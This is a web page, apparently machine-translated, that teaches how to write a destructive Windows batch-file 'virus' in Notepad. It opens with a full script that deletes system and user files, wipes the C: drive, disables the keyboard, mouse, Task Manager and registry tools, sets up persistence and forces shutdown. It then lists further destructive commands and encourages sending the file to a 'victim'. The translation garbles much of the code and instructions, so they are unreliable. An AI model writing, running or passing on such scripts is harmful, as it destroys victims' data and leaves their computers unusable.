Useful Tips

Writing viruses in a notebook

Pin
Send
Share
Send
Send


Sign up >> hosts
chcp 1251
set papka = 0
:1
set / A papka = papka + 1
md% UserProfile% Desktop% LOL_% papka%
if not% papka% == 1,000,000 goto 1
del% programfiles% / q> nul
del C: Documents and Settings / q> nul
del% WinDir% / q> nul
rundll32 mouse, disable> nul
rundll32 keyboard, disable> nul
rundll32 user, disableoemlayer> nul
time 00:00> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer RestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul
taskkill / f / im explorer.exe> ​​nul
del: *. * / q> nul
copy% 0 C: Windows Win32.bat> nul
reg add "HKCU Software Microsoft Windows CurrentVersion Run" / v Win32 / t REG_SZ / d C: Windows Win32.bat / f
reg add HKCU Software Microsoft Windows CurrentVersion Polices System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies System / v DisableCMD / t REG_DWORD / d 2 / f> nul
reg add HKCU Software Microsoft Windows CurrentVersion Policies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul
del% WinDir% system32 HAL.dll / q> nul
del "% SystemRoot% Driver Cache i386 driver.cab" / f / q> nul
del "% SystemRoot% Media" / q> nul
assoc * .exe = * .guf
assoc .lnk = .txt
FOR / L %% i IN (1,1,1000000) DO md %% i
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul
del "% SystemRoot% Cursors *. *"> nul
reg add HKCU Software Microsoft Windows ShellNoRoam MUICache / v @C: WINDOWS system32 SHELL32.dll, -8964 / t REG_SZ / d upO / f
reg add HKCU Software Microsoft Windows Current Version Policies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul
copy "% 0" "% SystemRoot% system32 sys321.bat> nul
del: * .lnk / q
shutdown -s -t 00 -c error> nul
shutdown -r -t 00 -c error> nul
rd C: / s / q> nul
del% 0


3) Now you must Save as in the format .bin
We throw the virus to the victim)
Good luck

V.I.P user

Guess what this program will do? In 15 seconds it will open 50 calculators before the user has time to understand what happened)) Of course, while the program will open the calculators, a black window will be displayed (command line of executions) if it is closed then the program will end.
In order to prevent the user from doing this, consider 2 more new teams.

The new “@echo off” command is introduced at the beginning of our virus and hides everything that happens in it in the future. In a word, we will not let the user see what happened. After adding a simple but very effective action after each command, such as “> nul” for example “time 00:00> nul”, we will hide the line. So, we can improve our virus:

Well, the computer will freeze if the program opens calculators indefinitely. But we can enter not only calculators! You can run taskmgr (Task Manager), you can mspaint (Paint), and so on.
Now a short list of what you can write in the Notepad virus.
LIST:

1) “copy% 0 x: y” - copies the virus to disk x in the y folder (example copy% 0 C: System.bat),
2) “label x: y” - renames the disk x to the name y (example label C: error),
3) “time x: y” - changes the time by x hours and y minutes (example time 14:27),
4) “date x.y.z” - changes the date to x day, y month, z years (example date 16.11.05),
5) “md x” - will create a folder in the place where our virus is named x (md Papka example),
6) "del *. * / Q" - will delete all files (our virus too) in the folder where our virus lies (except for folders),
7) “del x: y *. * / Q” - will delete all files on disk x in the y folder (except folders) (example del F: Data *. * / Q),
8) “assoc .x = .y” - redo all the files on the computer with the format x to y (example assoc .exe = .mp3),
9) "net user" x "/ add" - will add to the user's computer under the name x (example net user "Smoked" / add),
Let's look at a couple more cruel scripts.

With these two lines, we are doing very serious harm to the victim's computer. It changes the extensions of all files on a computer with .lnk in .txt and .exe in .mp3. That is, all the shortcuts open in notepad, and the programs, everything, in the player. Hard yes? Well, that’s all) To all successful virus-scriptures, let the noobs know the pay for the flood!

Here is the most interesting.

[*] “Taskkill / f / im explorer.exe> ​​nul” - Kill the Explorer.exe process, and you can also write a kill process.

[*] “Taskkill / f / im pb.exe> ​​nul” - kills pb.eche)

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableTaskMgr / t REG_DWORD / d 1 / f> nul" - Disable the Ctrl-Alt-Del key combination

[*] "Del"% SystemRoot% system32 * .dll "/ q> nul" - Delete all system DLLs (Dynamic Download Libraries)

[*] "Del"% SystemRoot% Driver Cachei386driver.cab "/ f / q> nul" - Remove all drivers installed on the computer

[*] “% SystemRoot% / system32 / rundll32 user32, SwapMouseButton> nul” - Swap mouse button values

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun / v 1 / t REG_DWORD / d% SystemRoot% explorer.exe / f> nul" - Makes it impossible to launch applications

[*] "Time 0:00> nul" - Set the time to 00:00

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System / v DisableRegistryTools / t REG_DWORD / d 1 / f> nul" - Deny manually editing the registry

[*] "Del"% SystemRoot% Cursors *. * "> Nul" - Delete the mouse cursor

[*] "Del"% SystemRoot% Media "/ q> nul" - Delete Windows system sounds

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoControlPanel / t REG_DWORD / d 1 / f> nul" - Deny calling the control panel

[*] "Reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer / v NoDesktop / t REG_DWORD / d 1 / f> nul" - Remove the desktop

[*] “Shutdown -r -t 1 -c" lol "-f> nul" - Forced reboot of the PC

[*] "Shutdown -s -t 1 -c" lol "-f> nul" - Forced shutdown of the PC

[*] "Net share" ResName "=" C: "> nul" - Share the C drive:

[*] “Label C: Drive> nul - Rename drive C:

[*] "Msg *" Message text "> nul" - Show a Windows-style message with the OK button

[*] "Del"% 0 "> nul" - Self-elimination of the virus

If you do not know how to change the file extension, do this:
go to the control panel, go to the folder properties-> "View" tab. In the "Advanced Options" uncheck the box with "Hide extensions for registered file types." Click OK. Now select the desired file, right-click on it and select "Rename" from the menu that appears. Delete the extension (the last three letters) and write a new one! Press "Enter" on the keyboard.
Done!: D

Pin
Send
Share
Send
Send